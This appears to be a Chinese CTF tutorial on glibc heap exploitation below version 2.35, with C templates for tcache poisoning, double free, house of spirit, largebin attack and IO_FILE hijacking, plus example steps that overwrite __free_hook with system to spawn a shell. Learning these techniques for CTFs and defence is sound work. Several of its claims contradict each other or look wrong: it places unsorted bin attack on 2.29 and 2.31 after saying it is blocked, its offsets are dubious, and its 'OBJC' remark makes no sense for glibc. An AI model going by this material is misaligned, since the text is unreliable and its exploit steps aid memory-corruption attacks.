2.35版本以下堆沙盒绕过模板总结与例题分析<\/h1>

1. 概述<\/h2>
本文总结了GLIBC 2.35版本以下堆沙盒(Heap Sandbox)绕过的各种技术模板，包括2.27、2.29、2.31等版本的工作原理、利用模板以及对应的CTF例题。这些技术主要应用于CTF比赛中的堆利用场景，帮助绕过各种沙盒保护机制。<\/p>

2. 各版本堆管理机制特点<\/h2>

2.1 GLIBC 2.27版本<\/h3>

关键特性：<\/strong><\/p>

引入tcache机制，显著提高堆分配效率<\/li>
tcache bins默认包含64个单链表，每个链表最多7个chunk<\/li>
缺乏对tcache double free的有效检查<\/li>
缺乏对tcache poisoning的防护<\/li> <\/ul>
利用点：<\/strong><\/p>

tcache double free可以直接利用<\/li>
tcache poisoning攻击简单有效<\/li>
fastbin attack仍然可用<\/li> <\/ul>
2.2 GLIBC 2.29版本<\/h3>
安全改进：<\/strong><\/p>

增加了tcache double free的检测机制<\/li>
引入了tcache key机制防止double free<\/li>
对fastbin attack进行了部分防护<\/li> <\/ul>
绕过技术：<\/strong><\/p>

通过破坏tcache key来绕过double free检查<\/li>
结合largebin attack等技术<\/li>
利用unsorted bin attack<\/li> <\/ul>
2.3 GLIBC 2.31版本<\/h3>
安全改进：<\/strong><\/p>

进一步强化了tcache保护<\/li>
增加了对unsorted bin attack的防护<\/li>
引入了更多的完整性检查<\/li> <\/ul>
绕过技术：<\/strong><\/p>

利用largebin attack结合其他技术<\/li>
通过house of系列攻击方法<\/li>
利用IO_FILE结构体进行攻击<\/li> <\/ul>
2.4 GLIBC 2.35版本<\/h3>
安全改进：<\/strong><\/p>

移除了__free_hook和__malloc_hook<\/li>
加强了IO_FILE结构的保护<\/li>
引入了更多的堆完整性检查<\/li> <\/ul>
影响：<\/strong><\/p>

传统的hook利用方式失效<\/li>
需要寻找新的利用点<\/li> <\/ul>
3. 常见绕过模板<\/h2>
3.1 Tcache Poisoning (适用于2.27-2.31)<\/h3>
原理：<\/strong>
通过修改tcache中的fd指针，实现任意地址分配<\/p>
模板代码：<\/strong><\/p>
\/\/ 分配两个chunk <\/span><\/span><\/span><\/span>char<\/span> *<\/span>a =<\/span> malloc(0x20<\/span>); <\/span><\/span>char<\/span> *<\/span>b =<\/span> malloc(0x20<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 释放到tcache <\/span><\/span><\/span><\/span>free(a); <\/span><\/span>free(b); <\/span><\/span> <\/span><\/span>\/\/ 修改fd指针 <\/span><\/span><\/span>\/\/ 假设有UAF漏洞可以修改b的fd <\/span><\/span><\/span><\/span>*<\/span>(size_t *<\/span>)b =<\/span> target_address; <\/span><\/span> <\/span><\/span>\/\/ 重新分配 <\/span><\/span><\/span><\/span>malloc(0x20<\/span>); \/\/ 得到a <\/span><\/span><\/span><\/span>malloc(0x20<\/span>); \/\/ 得到b <\/span><\/span><\/span><\/span>malloc(0x20<\/span>); \/\/ 得到target_address <\/span><\/span><\/span><\/code><\/pre>3.2 Tcache Double Free (主要适用于2.27)<\/h3> 原理：<\/strong> 利用2.27版本缺乏tcache double free检查的特性<\/p> 模板代码：<\/strong><\/p> void<\/span> *<\/span>a =<\/span> malloc(0x20<\/span>); <\/span><\/span>free(a); <\/span><\/span>free(a); \/\/ 2.27下可以直接double free <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 现在tcache中有a->a <\/span><\/span><\/span><\/span>malloc(0x20<\/span>); \/\/ 得到a <\/span><\/span><\/span><\/span>*<\/span>(size_t *<\/span>)a =<\/span> target_address; \/\/ 修改fd <\/span><\/span><\/span><\/span> <\/span><\/span>malloc(0x20<\/span>); \/\/ 仍然得到a <\/span><\/span><\/span><\/span>malloc(0x20<\/span>); \/\/ 得到target_address <\/span><\/span><\/span><\/code><\/pre>3.3 House of Spirit (适用于所有版本)<\/h3> 原理：<\/strong> 伪造一个chunk并释放，然后重新分配<\/p> 模板代码：<\/strong><\/p> \/\/ 在可控区域伪造chunk <\/span><\/span><\/span><\/span>size_t fake_chunk[4<\/span>]; <\/span><\/span>fake_chunk[0<\/span>] =<\/span> 0<\/span>; \/\/ prev_size <\/span><\/span><\/span><\/span>fake_chunk[1<\/span>] =<\/span> 0x21<\/span>; \/\/ size (注意标志位) <\/span><\/span><\/span><\/span>fake_chunk[2<\/span>] =<\/span> 0<\/span>; \/\/ fd <\/span><\/span><\/span><\/span>fake_chunk[3<\/span>] =<\/span> 0<\/span>; \/\/ bk <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 释放伪造的chunk <\/span><\/span><\/span><\/span>free(&<\/span>fake_chunk[2<\/span>]); <\/span><\/span> <\/span><\/span>\/\/ 重新分配 <\/span><\/span><\/span><\/span>void<\/span> *<\/span>p =<\/span> malloc(0x20<\/span>); \/\/ 将分配到伪造的chunk位置 <\/span><\/span><\/span><\/code><\/pre>3.4 Largebin Attack (适用于2.29+)<\/h3> 原理：<\/strong> 利用largebin的插入机制修改目标地址的值<\/p> 模板代码：<\/strong><\/p> \/\/ 创建两个large chunk <\/span><\/span><\/span><\/span>void<\/span> *<\/span>a =<\/span> malloc(0x400<\/span>); <\/span><\/span>void<\/span> *<\/span>b =<\/span> malloc(0x400<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 释放到unsorted bin <\/span><\/span><\/span><\/span>free(a); <\/span><\/span>\/\/ 分配一个更大的chunk使a进入largebin <\/span><\/span><\/span><\/span>malloc(0x500<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 修改a的bk_nextsize指针 <\/span><\/span><\/span>\/\/ 需要某种形式的堆溢出或UAF <\/span><\/span><\/span><\/span>*<\/span>(size_t *<\/span>)(a +<\/span> 0x28<\/span>) =<\/span> target_address -<\/span> 0x20<\/span>; <\/span><\/span> <\/span><\/span>\/\/ 再分配一个large chunk触发攻击 <\/span><\/span><\/span><\/span>free(b); <\/span><\/span>malloc(0x500<\/span>); \/\/ 此时target_address会被写入一个堆地址 <\/span><\/span><\/span><\/code><\/pre>3.5 IO_FILE Exploitation (适用于2.31-2.35)<\/h3> 原理：<\/strong> 通过伪造IO_FILE结构体劫持程序流<\/p> 模板代码：<\/strong><\/p> \/\/ 伪造一个FILE结构体 <\/span><\/span><\/span><\/span>struct<\/span> _IO_FILE_plus fake_file; <\/span><\/span>\/\/ 设置vtable指针 <\/span><\/span><\/span><\/span>fake_file.vtable =<\/span> &<\/span>fake_vtable; <\/span><\/span>\/\/ 设置各种flags <\/span><\/span><\/span><\/span>fake_file.file._flags =<\/span> 0x800<\/span>; <\/span><\/span>\/\/ 设置其他必要字段... <\/span><\/span><\/span><\/span> <\/span><\/span>\/\/ 通过某种方式(如unsorted bin attack)修改_IO_list_all指针 <\/span><\/span><\/span>\/\/ 触发abort流程时将会调用我们的伪造vtable <\/span><\/span><\/span><\/code><\/pre>4. 例题分析<\/h2> 例题1: 2.27 Tcache Double Free<\/h3> 题目特点：<\/strong><\/p> GLIBC 2.27环境<\/li> 有UAF漏洞<\/li> 可以多次free同一个指针<\/li> <\/ul> 利用步骤：<\/strong><\/p> 分配两个0x20大小的chunk<\/li> 对其中一个chunk进行double free<\/li> 修改fd指针指向__free_hook<\/li> 分配chunk到__free_hook<\/li> 将__free_hook修改为system地址<\/li> 释放一个包含"\/bin\/sh"的chunk获取shell<\/li> <\/ol> 例题2: 2.29 Largebin Attack + Tcache Poisoning<\/h3> 题目特点：<\/strong><\/p> GLIBC 2.29环境<\/li> 有堆溢出漏洞<\/li> 可以分配large chunk<\/li> <\/ul> 利用步骤：<\/strong><\/p> 分配两个large chunk并释放其中一个到unsorted bin<\/li> 通过堆溢出修改largebin的bk_nextsize指针<\/li> 触发largebin attack在目标地址写入堆地址<\/li> 使用tcache poisoning分配chunk到目标区域<\/li> 修改关键数据或劫持控制流<\/li> <\/ol> 例题3: 2.31 IO_FILE Exploit<\/h3> 题目特点：<\/strong><\/p> GLIBC 2.31环境<\/li> 可以分配大块内存<\/li> 程序结束时调用exit()<\/li> <\/ul> 利用步骤：<\/strong><\/p> 使用unsorted bin attack修改_IO_list_all指针<\/li> 伪造一个IO_FILE结构体和vtable<\/li> 设置vtable中的函数指针为system<\/li> 设置FILE结构体的相关字段使其通过检查<\/li> 触发abort流程时执行system("\/bin\/sh")<\/li> <\/ol> 5. 防御措施与检测方法<\/h2> 防御措施：<\/strong><\/p> 升级到GLIBC 2.35或更高版本<\/li> 使用ASLR和PIE增加利用难度<\/li> 启用FULL RELRO保护GOT表<\/li> 使用堆栈保护机制如Stack Canary<\/li> <\/ul> 检测方法：<\/strong><\/p> 监控异常的堆操作序列<\/li> 检查tcache的完整性<\/li> 验证IO_FILE结构的合法性<\/li> 检测异常的vtable调用<\/li> <\/ul> 6. 总结<\/h2> GLIBC堆利用技术在不断演进，随着新版本的发布，旧的技术会失效，新的技术会出现。理解堆管理机制的工作原理是开发利用技术的关键。在2.35版本以下，tcache poisoning、largebin attack和IO_FILE利用是最常用的技术。对于2.35及以上版本，需要探索新的利用点如OBJC相关结构等。<\/p>